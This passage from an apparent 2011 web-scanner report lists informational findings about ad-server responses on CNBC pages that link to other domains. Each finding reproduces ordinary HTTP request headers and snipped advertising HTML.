%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/FXM/go/308880957/direct/01/7533182" target="_blank"><img src="http://view.atdmt.com/FXM/view/308880957/direct/01/7533182"/></a>
...[SNIP]...

19.13. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/nbcu.cnbc/home_homeus

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=15;tile=15;sz=120x60;ord=638232543366?

The response contains the following link to another domain:

http://view.atdmt.com/FXM/view/308880957/direct/01/466318

Request

GET /adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=15;tile=15;sz=120x60;ord=638232543366? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1656
Date: Tue, 06 Sep 2011 16:04:29 GMT

document.write('<iframe src=\"http://view.atdmt.com/FXM/iview/308880957/direct/01/466318?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B414
...[SNIP]...
B%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/FXM/go/308880957/direct/01/466318" target="_blank"><img src="http://view.atdmt.com/FXM/view/308880957/direct/01/466318"/></a>
...[SNIP]...

19.14. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/nbcu.cnbc/home_homeus

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=15;tile=15;sz=120x60;ord=913041004911?

The response contains the following link to another domain:

http://view.atdmt.com/FXM/view/308880957/direct/01/5912867

Request

GET /adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=15;tile=15;sz=120x60;ord=913041004911? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1661
Date: Tue, 06 Sep 2011 15:03:36 GMT

document.write('<iframe src=\"http://view.atdmt.com/FXM/iview/308880957/direct/01/5912867?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41
...[SNIP]...
%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/FXM/go/308880957/direct/01/5912867" target="_blank"><img src="http://view.atdmt.com/FXM/view/308880957/direct/01/5912867"/></a>
...[SNIP]...

19.15. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/nbcu.cnbc/home_homeus

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=15;tile=15;sz=120x60;ord=819761534221?

The response contains the following link to another domain:

http://view.atdmt.com/FXM/view/308880957/direct/01/7067761

Request

GET /adj/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=15;tile=15;sz=120x60;ord=819761534221? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1661
Date: Tue, 06 Sep 2011 14:56:39 GMT

document.write('<iframe src=\"http://view.atdmt.com/FXM/iview/308880957/direct/01/7067761?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/3/0/%2a/j%3B239406505%3B0-0%3B1%3B62912129%3B6-120/60%3B41
...[SNIP]...
%21c%3Dhome%3B%21c%3Dhomeus%3Btandomad%3Dnone%3Bpm%3D1%3Bpos%3D15%3Btile%3D15%3Bsz%3D120x60%3B%7Eaopt%3D2/0/b7/0%3B%7Esscs%3D%3fhttp://clk.atdmt.com/FXM/go/308880957/direct/01/7067761" target="_blank"><img src="http://view.atdmt.com/FXM/view/308880957/direct/01/7067761"/></a>
...[SNIP]...

19.16. http://ad.doubleclick.net/adj/nbcu.cnbc/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/nbcu.cnbc/search

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/nbcu.cnbc/search;site=cnbc;sect=search;!c=search;tandomad=none;pm=1;dcopt=ist;pos=2;tile=2;sz=300x250;ord=478950738499?

The response contains the following link to another domain:

http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png

Request

GET /adj/nbcu.cnbc/search;site=cnbc;sect=search;!c=search;tandomad=none;pm=1;dcopt=ist;pos=2;tile=2;sz=300x250;ord=478950738499? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 42850
Date: Tue, 06 Sep 2011 15:00:20 GMT

var divid='dclkAdsDivID_26537';
document.write('<div id=' + divid + '></div>');
var adsenseHtml_26537 = "<html><head></head><body leftMargin=\"0\" topMargin=\"0\" marginwidth=\"0\" marginheight=\"0\">
...[SNIP]...
all%2526keywords%253Dxss%2526categories%253Dexclude%26hl%3Den%26client%3Dca-pub-5672557457834454%26adU%3Dgoogle.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNGuSCiHBeUEF7YWYU4QbiFDKY0j0Q\" target=_blank><img alt=\"AdChoices\" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...

19.17. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**

Issue detail

The page was loaded from a URL containing a query string:

http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA

The response contains the following link to another domain:

http://ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Logo.png

Request

Response

19.18. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**

Issue detail

The page was loaded from a URL containing a query string:

http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA

The response contains the following link to another domain:

http://ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/7_gradient_120x60NL.jpg

Request

Response

19.19. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**

Issue detail

The page was loaded from a URL containing a query string:

http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA

The response contains the following link to another domain:

http://ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_New$7.png

Request

Response

19.20. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**

Issue detail

The page was loaded from a URL containing a query string:

http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA

The response contains the following link to another domain:

http://ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Logo.png

Request

Response

19.21. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**

Issue detail

The page was loaded from a URL containing a query string:

http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA

The response contains the following link to another domain:

http://ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Tools.png

Request

Response

19.22. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**

Issue detail

The page was loaded from a URL containing a query string:

http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA

The response contains the following link to another domain:

http://ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_Tools.png

Request

Response

19.23. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**

Issue detail

The page was loaded from a URL containing a query string:

http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA

The response contains the following link to another domain:

http://ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_Peel_0Setup.png

Request

Response

19.24. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**

Issue detail

The page was loaded from a URL containing a query string:

http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA

The response contains the following link to another domain:

http://ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/MF-Static_Diversification%20120x60.gif

Request

Response

19.25. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**

Issue detail

The page was loaded from a URL containing a query string:

http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA

The response contains the following link to another domain:

http://ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/120x60_New$7.png

Request

Response

19.26. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**

Issue detail

The page was loaded from a URL containing a query string:

http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**;10,3,183;1920;1200;http%3A_@2F_@2Fdata.cnbc.com_@2Fquotes_@2F.DJIA

The response contains the following link to another domain:

http://ad.wsodcdn.com/8bec9b10877d5d7fd7c0fb6e6a631357/7_gradient_120x60NL.jpg

Request

Response

19.27. http://ads.adsonar.com/adserving/getAds.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adsonar.com
Path:	/adserving/getAds.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://ads.adsonar.com/adserving/getAds.jsp?previousPlacementIds=&placementId=1515491&pid=2257767&ps=-1&zw=336&zh=300&url=http%3A//www.cnbc.com/&v=5&dct=Stock%20Market%20News%2C%20Business%20News%2C%20Financial%2C%20Earnings%2C%20World%20Market%20News%20and%20Information%20-%20CNBC&ref=http%3A//search.cnbc.com/main.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26source%3D%28The%2520Associated%2520Press%2520OR%2520Reuters%2520OR%2520AFX%2520OR%2520The%2520New%2520York%2520Times%2520OR%2520CNBC.COM%29%26layout%3DNoPic%26pubtime%3D0%26pubfreq%3Dh

The response contains the following link to another domain:

http://cnbc.sl.advertising.com/admin/advertisers/indexPl.jsp

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1515491&pid=2257767&ps=-1&zw=336&zh=300&url=http%3A//www.cnbc.com/&v=5&dct=Stock%20Market%20News%2C%20Business%20News%2C%20Financial%2C%20Earnings%2C%20World%20Market%20News%20and%20Information%20-%20CNBC&ref=http%3A//search.cnbc.com/main.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26source%3D%28The%2520Associated%2520Press%2520OR%2520Reuters%2520OR%2520AFX%2520OR%2520The%2520New%2520York%2520Times%2520OR%2520CNBC.COM%29%26layout%3DNoPic%26pubtime%3D0%26pubfreq%3Dh HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: oo_flag=t

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:56:43 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 13432

           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
<td class="sps_1515489" style="height:12px;" nowrap="nowrap" align="right">
                                        <a href="http://cnbc.sl.advertising.com/admin/advertisers/indexPl.jsp" target="_blank">

                                           Buy a link here

                                       </a>
...[SNIP]...

19.28. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The page was loaded from a URL containing a query string:

http://ads.pointroll.com/PortalServe/?pid=1398295G52620110830164853&pub=IC13501&flash=10&time=2|14:57|-5&redir=http://a1.interclick.com/icaid/192677/tid/1ff795b7-a8cc-487d-bdd1-056be6aa440f/click.ic?$CTURL$&pos=x&dom=http://search.cnbc.com&r=0.07496926933526993

The response contains the following link to another domain:

http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

Request

Response

19.29. http://afe.specificclick.net/serve/v=5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://afe.specificclick.net
Path:	/serve/v=5

Issue detail

The page was loaded from a URL containing a query string:

http://afe.specificclick.net/serve/v=5;m=3;l=4749;c=176996;b=1045098;ts=20110906105904

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];ord=1315321145?
http://ad.doubleclick.net/adi/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=176996%3Bb=1045098%3Bts=20110906105905%3Bdct=;ord=1315321145?
http://ad.doubleclick.net/adj/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=176996%3Bb=1045098%3Bts=20110906105905%3Bdct=;ord=1315321145?
http://ad.doubleclick.net/jump/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];ord=1315321145?
http://cache.specificmedia.com/creative/blank.gif?ts=20110906105905&cmxid=2101.020017699601045098xmc
http://cache.specificmedia.com/otherassets/ad_options_icon.png
http://specificmedia.com/sites/privacy/?cid=176996&bid=1045098&lid=4749

Request

GET /serve/v=5;m=3;l=4749;c=176996;b=1045098;ts=20110906105904 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=f3fe521e99c2f212b60492987a2d

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Tue, 06 Sep 2011 14:59:05 GMT
Vary: Accept-Encoding
Content-Length: 1708
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
<div style="z-index:10; position:relative; width:300px"><IFRAME SRC="http://ad.doubleclick.net/adi/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=176996%3Bb=1045098%3Bts=20110906105905%3Bdct=;ord=1315321145?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=176996%3Bb=1045098%3Bts=20110906105905%3Bdct=;ord=1315321145?"></SCRIPT><NOSCRIPT><A HREF="http://ad.doubleclick.net/jump/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];ord=1315321145?"><IMG SRC="http://ad.doubleclick.net/ad/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];ord=1315321145?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...
<div style="z-index:2147483647; position:absolute; right:0px; top:0px; background:transparent; opacity:0.8; filter:alpha(opacity=80);"><a href="http://specificmedia.com/sites/privacy/?cid=176996&bid=1045098&lid=4749" target="_blank"><img src="http://cache.specificmedia.com/otherassets/ad_options_icon.png" style="border-style:none"></a></div></div><img src="http://cache.specificmedia.com/creative/blank.gif?ts=20110906105905&cmxid=2101.020017699601045098xmc" style="display: none" height="1" width="1" border="0" /></body>
...[SNIP]...

19.30. http://afe.specificclick.net/serve/v=5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://afe.specificclick.net
Path:	/serve/v=5

Issue detail

The page was loaded from a URL containing a query string:

http://afe.specificclick.net/serve/v=5;m=3;l=4749;c=176996;b=1045098;ts=20110906110541

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];ord=1315321541?
http://ad.doubleclick.net/adi/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=176996%3Bb=1045098%3Bts=20110906110541%3Bdct=;ord=1315321541?
http://ad.doubleclick.net/adj/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=176996%3Bb=1045098%3Bts=20110906110541%3Bdct=;ord=1315321541?
http://ad.doubleclick.net/jump/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];ord=1315321541?
http://cache.specificmedia.com/creative/blank.gif?ts=20110906110541&cmxid=2101.020017699601045098xmc
http://cache.specificmedia.com/otherassets/ad_options_icon.png
http://specificmedia.com/sites/privacy/?cid=176996&bid=1045098&lid=4749

Request

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=f45f2c4eedfe5c52c57643e800e5; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Tue, 06 Sep 2011 15:05:40 GMT
Vary: Accept-Encoding
Content-Length: 1708
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
<div style="z-index:10; position:relative; width:300px"><IFRAME SRC="http://ad.doubleclick.net/adi/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=176996%3Bb=1045098%3Bts=20110906110541%3Bdct=;ord=1315321541?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=176996%3Bb=1045098%3Bts=20110906110541%3Bdct=;ord=1315321541?"></SCRIPT><NOSCRIPT><A HREF="http://ad.doubleclick.net/jump/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];ord=1315321541?"><IMG SRC="http://ad.doubleclick.net/ad/N763.SpecificMedia/B5646003.2;sz=300x250;pc=[TPAS_ID];ord=1315321541?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...
<div style="z-index:2147483647; position:absolute; right:0px; top:0px; background:transparent; opacity:0.8; filter:alpha(opacity=80);"><a href="http://specificmedia.com/sites/privacy/?cid=176996&bid=1045098&lid=4749" target="_blank"><img src="http://cache.specificmedia.com/otherassets/ad_options_icon.png" style="border-style:none"></a></div></div><img src="http://cache.specificmedia.com/creative/blank.gif?ts=20110906110541&cmxid=2101.020017699601045098xmc" style="display: none" height="1" width="1" border="0" /></body>
...[SNIP]...

19.31. http://afe.specificclick.net/serve/v=5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://afe.specificclick.net
Path:	/serve/v=5

Issue detail

The page was loaded from a URL containing a query string:

http://afe.specificclick.net/serve/v=5;m=3;l=4749;c=177065;b=1045312;ts=20110906111049

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N763.SpecificMedia.com/B5645537.38;sz=300x250;pc=[TPAS_ID];ord=1315321849?
http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.38;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=177065%3Bb=1045312%3Bts=20110906111049%3Bdct=;ord=1315321849?
http://ad.doubleclick.net/adj/N763.SpecificMedia.com/B5645537.38;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=4749%3Bc=177065%3Bb=1045312%3Bts=20110906111049%3Bdct=;ord=1315321849?
http://ad.doubleclick.net/jump/N763.SpecificMedia.com/B5645537.38;sz=300x250;pc=[TPAS_ID];ord=1315321849?
http://cache.specificmedia.com/creative/blank.gif?ts=20110906111049&cmxid=2101.020017706501045312xmc
http://cache.specificmedia.com/otherassets/ad_options_icon.png
http://specificmedia.com/sites/privacy/?cid=177065&bid=1045312&lid=4749

Request

GET /serve/v=5;m=3;l=4749;c=177065;b=1045312;ts=20110906111049 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339845382&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=f45f2c4eedfe5c52c57643e800e5

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=f4aa63ac19a41e25cbb18981ca05; Path=/
